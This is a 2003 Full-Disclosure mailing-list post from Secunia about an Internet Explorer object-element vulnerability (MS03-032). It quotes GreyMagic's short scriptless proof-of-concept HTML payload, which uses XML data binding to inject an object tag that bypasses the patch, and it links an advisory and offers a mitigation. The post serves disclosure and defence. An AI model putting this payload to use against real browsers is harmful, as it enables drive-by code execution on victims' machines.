You may protect yourself by disabling "Run ActiveX controls and plug-ins".
We have made a test page based on the information provided by http-equiv and GreyMagic: http://www.secunia.com/MS03-032/ See also SA9580: http://www.secunia.com/advisories/9580/ On Mon, 2003-09-08 at 16:52, GreyMagic Software wrote: > >The patch for Drew's object data=funky.hta doesn't work: > > This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which > explains the problem in detail. Microsoft again patches the object element > in HTML, but it doesn't patch the dynamic version of that same element. > > >1. Disable Active Scripting > > This actually means that no scripting is needed at all in order to exploit > this amazingly critical vulnerability: > > <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> > <xml id="oExec"> > <security> > <exploit> > <![CDATA[ > <object data=x.asp></object> > ]]> > </exploit> > </security> > </xml> > > Ouch. > > > -- Kind regards, Thomas Kristensen CTO Secunia Toldbodgade 37B 1253 Copenhagen K Denmark Tlf.: +45 7020 5144 Fax: +45 7020 5145 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
